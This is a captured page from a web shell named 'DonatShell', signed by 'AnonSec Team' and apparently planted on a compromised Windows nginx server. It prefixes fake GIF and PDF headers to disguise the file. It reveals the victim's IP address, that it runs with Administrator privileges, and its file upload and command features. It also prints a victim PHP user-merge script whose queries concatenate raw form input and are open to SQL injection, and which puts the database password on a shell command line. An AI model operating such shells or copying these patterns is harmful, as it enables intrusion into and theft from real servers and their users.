GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Admin/User/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/nginx/html/Admin/User/userMerge.phpinc
<?
// Admin/UserMerge.phpinc
// Merge user accounts.

#setDebugOn();

debugTrackBegin();
if (dc()) { echo basename(__FILE__)," line ",__LINE__,": ","<b>".__FILE__."</b><br>\n"; }

if ($debugIP) {
	echo "<b>\$_POST=</b><pre>"; print_r($_POST); echo "</pre>: ",basename(__FILE__),": ",__LINE__,"<br>\n";
	echo "<b>\$_SESSION['uuid']=",$_SESSION['uuid'],"</b>: ",basename(__FILE__),": ",__LINE__,"<br>\n";
	setDebugOn();
	include('common/pageFooter.phpinc');
}
/* */
$f_message = '';
if ($f_form == 'form_userMerge' && isset($_SESSION['uuid']) && isset($f_uuid) && $f_uuid != $_SESSION['uuid']) {
	// Get the userId to merge.
	$f_userIdToMergeTo = formValue('userIdToMergeTo');
	#echo "<b>\$f_userIdToMergeTo=",$f_userIdToMergeTo,"</b>: ",basename(__FILE__),": ",__LINE__,"<br>\n";
	// Make sure $f_userIdToMergeTo is a valid userId.
	$query = "
	SELECT userId
	FROM user
	WHERE userId = ".$f_userIdToMergeTo."
	";
	$userIdToMergeToResult = query_do($query);
	$userIdToMergeToCount = $_SESSION['qry']['count'];
	if ($userIdToMergeToCount) {
		// Continue only if the userStudentId was found.
		$f_count = formValue('count');
		if ($f_count > 1) {
			// Create array of merge userId's.
			$f_userIdToMergeFrom = array();
			for ($i=1; $i<=$f_count; $i++) {
				$f_this_userIdToMergeFrom = formValue('userIdToMergeFrom_'.$i);
				if ($f_this_userIdToMergeFrom != $f_userIdToMergeTo) {
					$f_userIdToMergeFrom[$i] = $f_this_userIdToMergeFrom;
				}
			}
			#echo "<b>\$f_userIdToMergeFrom="; print_r($f_userIdToMergeFrom); echo "</b>: ",basename(__FILE__),": ",__LINE__,"<br>\n";
			#echo "<b>count($f_userIdToMergeFrom)=",count($f_userIdToMergeFrom),"</b>: ",basename(__FILE__),": ",__LINE__,"<br>\n";
			if (count($f_userIdToMergeFrom)) {
				// Backup the database before merge.
				$backupFilePath = $_SESSION['DIRECTORY_ROOT'].'Admin/backup/';
				$backupFilename = $_SESSION['DATABASE']['database'].'_before_user_merge_'.date("Ymd_His").".sql";
				$mysqlCommandPath = 'D:/MySQL/bin/';
				$backupCommand = $mysqlCommandPath.'mysqldump --opt --user='.$_SESSION['DATABASE']['username'].' --password='.$_SESSION['DATABASE']['password'].' '.$_SESSION['DATABASE']['database'].' > '.$backupFilePath.$backupFilename;
				system($backupCommand);
				$backupFound = file_exists($backupFilePath.$backupFilename);
				if ($backupFound) {
					$f_message .= "Database backed up to ".$backupFilename.".<br>";
					// Get list of tables.
					$query="SHOW TABLES FROM ".$_SESSION['DATABASE']['database'];
					$queryField = 'Tables_in_'.$_SESSION['DATABASE']['database'];
					$tableResult = query_do($query);
					$tableCount = $_SESSION['qry']['count'];	
					// Create array to hold delete queries as these must be performed after all updates.
					$f_DELETE_queryList = array();
					// Merge the duplicate users.
					foreach ($f_userIdToMergeFrom as $this_userIdToMergeFrom) {
						#echo "<b>\$this_userIdToMergeFrom=",$this_userIdToMergeFrom,"</b>: ",basename(__FILE__),": ",__LINE__,"<br>\n";
						// Continue only if the userId is not the one to merge to.
						// Parse through tables to change userId and *By fields.
						mysqli_data_seek($tableResult, 0);
						while ($tableRow = mysqli_fetch_assoc($tableResult)) {
							// Set $f_table.
							$f_table = $tableRow[$queryField];
							#echo basename(__FILE__)," line ",__LINE__,": ",'<span style="color:blue">$f_table='.$f_table."</span><br>\n";
							// Get the list of fields for this table.
							$query="SHOW COLUMNS FROM ".$f_table;
							$fieldResult = query_do($query);
							$fieldCount = $_SESSION['qry']['count'];
							// Parse table fields for userId and modifiedBy.
							while ($fieldRow = mysqli_fetch_assoc($fieldResult)) {
								// Get field name.
								$fieldName = $fieldRow['Field'];
								if (dc()) {
									#echo basename(__FILE__)," line ",__LINE__,": ","\$f_table=".$f_table." ";
									print_r($fieldRow); 
									echo "<br>\n";
								}
								// Continue if field name is userId or *By.
								if ($fieldName == 'userId' || substr($fieldName,strlen($fieldName)-2,2) == "By") {
									// Test if the fieldName is not userId or the table is not user or useruserpermission.
									if ($fieldName != 'userId' || ($f_table != 'user' && $f_table != 'useruserpermission')) {
										// This is not a userId field or the table is not the user or useruserpermission table.
										// Update the field to $f_userIdToMergeTo.
										$f_lastModified = currentDateTime();
										$query = "
										UPDATE ".$f_table."
											 SET ".$fieldName." = ".$f_userIdToMergeTo."
										 WHERE ".$fieldName." = ".$this_userIdToMergeFrom."
										";
										#echo basename(__FILE__)," line ",__LINE__,": ",'<span style="color:green">',"\$query=".$query.'</span>',"<br>\n";
										$tableUpdate = query_do($query);
									} else {
										// This is either the user or useruserpermission table.
										// Only delete the record if the field is userId.
										if ($fieldName == 'userId' || $fieldName == 'modifiedBy') {
											// Delete the duplicate record from the table.
											$f_DELETE_queryList[] = "
											DELETE FROM ".$f_table."
														WHERE ".$fieldName." = ".$this_userIdToMergeFrom."
											";
										}
									}
								}
							}
						}
						$f_message .= "Duplicate user ".userName($this_userIdToMergeFrom)." (userId ".$this_userIdToMergeFrom.") merged with ".userName($f_userIdToMergeTo)." (userId ".$f_userIdToMergeTo.").<br>";
					}
					foreach ($f_DELETE_queryList as $query) {
							#echo basename(__FILE__)," line ",__LINE__,": ",'<span style="color:red">',"\$query=".$query.'</span>',"<br>\n";
							$tableDelete = query_do($query);
					}
					#$_SESSION['uuid'] = $f_uuid;
				} else {
					// The backup failed.
					$f_message = 'Backup of database failed. Merge could not continue.<br>';
				}
			} else {
				// count($f_userIdToMergeFrom) is not >= 1. The list must have contained duplicate userId's. There are no other users to merge.
				$f_message = 'The list of users to merge only contained the merge target. Merge could not continue.<br>';
			}
		} else {
			// count is not > 2. There are no other users to merge.
			$f_message = 'The list of users to merge was empty. Merge could not continue.<br>';
		}
	} else {
		// userIdToMergeTo is not a valid userId. Merge could not continue.
		$f_message = 'The userId '.$f_userIdToMergeTo.' is not a valid userId. Merge could not continue.<br>';
	}
}
if ($debugIP) {
	#setDebugOn();
	#include('common/pageFooter.phpinc');
	#exit;
}
/* */
?>

Anon7 - 2022
AnonSec Team